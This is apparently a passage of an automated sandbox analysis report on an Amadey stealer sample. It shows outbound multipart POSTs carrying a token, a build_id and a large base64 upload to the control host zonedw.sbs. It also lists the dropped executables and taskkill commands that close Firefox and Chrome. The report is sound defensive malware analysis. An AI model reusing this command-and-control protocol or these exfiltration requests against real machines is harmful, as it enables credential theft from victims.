name="build_id"e411cf62bcba04d74fc6b505b9235404------ECBASJEKF37QIEU37QQICont
2024-12-14 11:58:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:06 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	50173	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:07 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----7QQIEKNGVAAAAIE3O8Q1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:07 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 0d 0a 43 6f 6e 74 Data Ascii: ------7QQIEKNGVAAAAIE3O8Q1Content-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------7QQIEKNGVAAAAIE3O8Q1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------7QQIEKNGVAAAAIE3O8Q1Cont
2024-12-14 11:58:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:08 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	50175	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:08 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IWLN7G4OZU37QIM7Q90H User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:08 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 57 4c 4e 37 47 34 4f 5a 55 33 37 51 49 4d 37 51 39 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 49 57 4c 4e 37 47 34 4f 5a 55 33 37 51 49 4d 37 51 39 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 57 4c 4e 37 47 34 4f 5a 55 33 37 51 49 4d 37 51 39 30 48 0d 0a 43 6f 6e 74 Data Ascii: ------IWLN7G4OZU37QIM7Q90HContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------IWLN7G4OZU37QIM7Q90HContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------IWLN7G4OZU37QIM7Q90HCont
2024-12-14 11:58:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:09 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	50177	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:10 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----UKFK6PZ58YM7QQ1V3OP8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:10 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 50 38 0d 0a 43 6f 6e 74 Data Ascii: ------UKFK6PZ58YM7QQ1V3OP8Content-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------UKFK6PZ58YM7QQ1V3OP8Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------UKFK6PZ58YM7QQ1V3OP8Cont
2024-12-14 11:58:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:11 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	50179	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:13 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----TRQIE37YCBIM7Q16XBIW User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 83785 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:13 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 57 0d 0a 43 6f 6e 74 Data Ascii: ------TRQIE37YCBIM7Q16XBIWContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------TRQIE37YCBIM7Q16XBIWContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------TRQIE37YCBIM7Q16XBIWCont
2024-12-14 11:58:13 UTC	16355	OUT	Data Raw: 33 39 72 76 70 6a 65 66 35 58 32 47 39 53 37 2b 35 75 33 37 51 77 32 39 52 6a 4f 37 72 7a 30 36 56 71 30 55 55 75 6c 67 4f 65 6b 38 50 33 39 6e 71 46 7a 64 36 46 71 73 64 6d 74 32 35 6c 6e 74 72 6d 31 38 2b 49 79 45 41 46 31 41 64 47 55 6e 48 50 7a 45 48 72 6a 4e 57 74 49 30 52 72 47 37 75 4e 51 76 62 78 72 37 55 72 68 56 53 53 63 78 68 46 56 42 6b 68 45 51 5a 32 72 6b 6b 39 53 53 54 79 54 78 57 76 52 51 74 41 65 70 67 36 62 6f 4e 35 70 74 39 64 4b 6d 6f 51 79 61 56 63 7a 79 33 44 57 6b 6c 72 6d 51 4e 4a 6b 73 50 4d 33 34 32 37 69 54 6a 62 6e 6e 47 61 72 32 2f 68 37 57 74 4d 67 2b 77 36 56 34 67 69 69 30 39 52 74 68 6a 75 62 4c 7a 70 59 46 2f 75 71 2b 39 51 51 4f 32 35 57 78 37 31 30 31 46 41 47 50 65 61 45 31 35 61 36 58 43 39 2f 4b 37 32 4e 33 48 63 74 Data Ascii: 39rvpjef5X2G9S7+5u37Qw29RjO7rz06Vq0UUulgOek8P39nqFzd6Fqsdmt25lntrm18+IyEAF1AdGUnHPzEHrjNWtI0RrG7uNQvbxr7UrhVSScxhFVBkhEQZ2rkk9SSTyTxWvRQtAepg6boN5pt9dKmoQyaVczy3DWklrmQNJksPM3427iTjbnnGar2/h7WtMg+w6V4gii09RthjubLzpYF/uq+9QQO25Wx7101FAGPeaE15a6XC9/K72N3Hct
2024-12-14 11:58:13 UTC	16355	OUT	Data Raw: 50 48 48 6a 47 32 53 34 6e 6e 52 48 74 4e 72 54 79 6d 52 77 44 45 54 67 73 65 54 6a 50 55 6b 6e 47 4f 54 57 2b 2f 68 54 52 58 30 79 30 30 38 57 6a 4a 62 32 62 46 37 59 78 54 79 4a 4a 43 54 6e 4a 57 52 57 44 6a 4f 54 33 37 31 4c 70 48 68 33 53 74 43 6d 75 70 74 4f 74 6a 46 4c 64 6c 57 75 48 61 56 35 47 6c 4b 35 77 57 4c 45 6b 6e 6b 35 50 55 39 38 30 37 37 2f 77 42 64 66 36 51 4d 35 37 55 64 4b 74 37 6a 34 71 36 62 4b 38 6c 34 47 62 54 5a 35 43 49 37 32 5a 46 79 73 6b 49 41 77 72 41 41 65 71 39 44 33 42 72 4c 73 4e 4d 31 58 56 2f 43 2b 76 58 30 4f 73 61 6d 64 55 53 38 75 31 73 63 58 6b 67 52 42 48 4d 78 56 4e 67 59 4b 51 53 75 4d 6b 45 34 4f 4f 67 78 58 63 33 32 69 32 4f 6f 33 6c 72 65 58 43 53 69 35 74 53 66 4a 6c 68 6e 6b 69 59 41 34 4a 42 4b 4d 4e 79 6e Data Ascii: PHHjG2S4nnRHtNrTymRwDETgseTjPUknGOTW+/hTRX0y008WjJb2bF7YxTyJJCTnJWRWDjOT371LpHh3StCmuptOtjFLdlWuHaV5GlK5wWLEknk5PU98077/wBdf6QM57UdKt7j4q6bK8l4GbTZ5CI72ZFyskIAwrAAeq9D3BrLsNM1XV/C+vX0OsamdUS8u1scXkgRBHMxVNgYKQSuMkE4OOgxXc32i2Oo3lreXCSi5tSfJlhnkiYA4JBKMNyn
2024-12-14 11:58:13 UTC	16355	OUT	Data Raw: 50 4c 34 48 33 63 39 48 34 74 73 35 62 7a 77 70 4c 61 43 4a 37 6c 32 65 41 4f 69 49 57 4c 41 53 70 75 34 48 62 47 54 53 36 44 36 32 2f 72 2b 6d 58 5a 66 45 6d 68 51 57 4d 56 39 4c 72 57 6e 52 32 6b 7a 46 59 70 33 75 6b 45 62 73 4f 6f 56 73 34 4a 47 44 30 39 4b 6d 75 74 5a 30 75 78 6d 74 34 62 7a 55 72 4f 33 6c 75 54 69 42 4a 70 31 52 70 54 77 50 6c 42 50 7a 64 52 30 39 61 35 4c 58 72 53 36 74 76 47 44 58 30 74 31 72 46 74 59 53 32 43 32 38 4d 6d 6d 57 4b 58 57 78 67 37 46 30 5a 66 4b 6b 5a 51 77 4b 45 45 41 41 37 63 45 38 43 71 2f 32 4a 74 45 6e 30 31 4e 46 68 31 4f 53 35 2b 79 32 31 73 39 76 65 32 42 6b 69 6e 67 44 45 67 4e 4b 71 68 59 70 45 44 4e 31 49 48 51 62 54 78 54 56 6d 44 30 2f 72 30 4f 7a 6d 31 76 53 62 62 55 6f 39 4f 6e 31 53 79 69 76 70 4d 62 Data Ascii: PL4H3c9H4ts5bzwpLaCJ7l2eAOiIWLASpu4HbGTS6D62/r+mXZfEmhQWMV9LrWnR2kzFYp3ukEbsOoVs4JGD09KmutZ0uxmt4bzUrO3luTiBJp1RpTwPlBPzdR09a5LXrS6tvGDX0t1rFtYS2C28MmmWKXWxg7F0ZfKkZQwKEEAA7cE8Cq/2JtEn01NFh1OS5+y21s9ve2BkingDEgNKqhYpEDN1IHQbTxTVmD0/r0Ozm1vSbbUo9On1SyivpMb
2024-12-14 11:58:13 UTC	16355	OUT	Data Raw: 49 4f 4a 47 56 53 70 44 6e 4f 47 79 43 42 77 63 35 47 57 6d 6b 61 78 70 6b 6d 69 33 71 61 61 4c 78 34 62 6d 38 75 62 6d 43 47 5a 41 30 58 6e 6b 73 46 51 75 51 47 49 33 59 36 67 48 42 35 36 56 33 46 46 48 51 48 72 2f 58 79 4f 4c 69 30 58 56 4c 69 55 36 6a 4e 5a 65 52 4c 64 61 31 46 65 50 62 47 52 43 30 4d 4b 52 69 4d 46 69 43 51 57 49 55 45 68 53 66 76 59 35 78 56 4f 7a 38 4c 79 57 31 39 50 5a 33 32 6b 36 72 65 78 79 61 67 39 79 6c 33 48 71 37 70 62 46 57 6b 38 77 46 34 76 4e 47 47 55 6e 47 41 6a 41 6c 51 63 38 6e 48 6f 46 46 43 30 2f 72 30 58 36 41 39 66 36 39 66 38 7a 6a 72 6e 51 72 2b 54 52 4e 55 74 6c 74 51 5a 62 6a 57 6b 75 6b 58 65 76 7a 52 43 61 4e 69 33 58 2b 36 70 34 50 50 46 61 44 77 61 6c 5a 65 49 39 54 31 43 33 30 2f 77 43 30 78 33 45 56 6e 45 Data Ascii: IOJGVSpDnOGyCBwc5GWmkaxpkmi3qaaLx4bm8ubmCGZA0XnksFQuQGI3Y6gHB56V3FFHQHr/XyOLi0XVLiU6jNZeRLda1FePbGRC0MKRiMFiCQWIUEhSfvY5xVOz8LyW19PZ32k6rexyag9yl3Hq7pbFWk8wF4vNGGUnGAjAlQc8nHoFFC0/r0X6A9f69f8zjrnQr+TRNUtltQZbjWkukXevzRCaNi3X+6p4PPFaDwalZeI9T1C30/wC0x3EVnE
2024-12-14 11:58:13 UTC	2010	OUT	Data Raw: 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 Data Ascii: RRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAB
2024-12-14 11:58:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:14 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	50181	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:16 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1NYU3OHDJMYU3ECBA1NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:16 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 4f 48 44 4a 4d 59 55 33 45 43 42 41 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 4f 48 44 4a 4d 59 55 33 45 43 42 41 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 4f 48 44 4a 4d 59 55 33 45 43 42 41 31 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------1NYU3OHDJMYU3ECBA1NYContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------1NYU3OHDJMYU3ECBA1NYContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------1NYU3OHDJMYU3ECBA1NYCont
2024-12-14 11:58:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	50183	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:18 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEUKNOH47GVAAAAIM7GL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:18 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 4f 48 34 37 47 56 41 41 41 41 49 4d 37 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 4f 48 34 37 47 56 41 41 41 41 49 4d 37 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 4f 48 34 37 47 56 41 41 41 41 49 4d 37 47 4c 0d 0a 43 6f 6e 74 Data Ascii: ------IEUKNOH47GVAAAAIM7GLContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------IEUKNOH47GVAAAAIM7GLContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------IEUKNOH47GVAAAAIM7GLCont
2024-12-14 11:58:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:55:01
Start date:	14/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xed0000
File size:	2'969'600 bytes
MD5 hash:	986A01646E19832CD4D612C37E1AC75B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1745261623.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1704042533.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:55:03
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xf20000
File size:	2'969'600 bytes
MD5 hash:	986A01646E19832CD4D612C37E1AC75B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1723413141.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:56:00
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xf20000
File size:	2'969'600 bytes
MD5 hash:	986A01646E19832CD4D612C37E1AC75B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2295922618.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:56:10
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe"
Imagebase:	0x20000
File size:	406'528 bytes
MD5 hash:	15A1CAF203C034ACFF6EB99EB66C5CF9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:56:10
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:56:11
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe"
Imagebase:	0x20000
File size:	406'528 bytes
MD5 hash:	15A1CAF203C034ACFF6EB99EB66C5CF9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:56:17
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe"
Imagebase:	0xfd0000
File size:	970'240 bytes
MD5 hash:	9BA5A9284F9E89843B0D21B2B2027B5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:56:18
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:56:18
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:56:20
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:56:20
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true
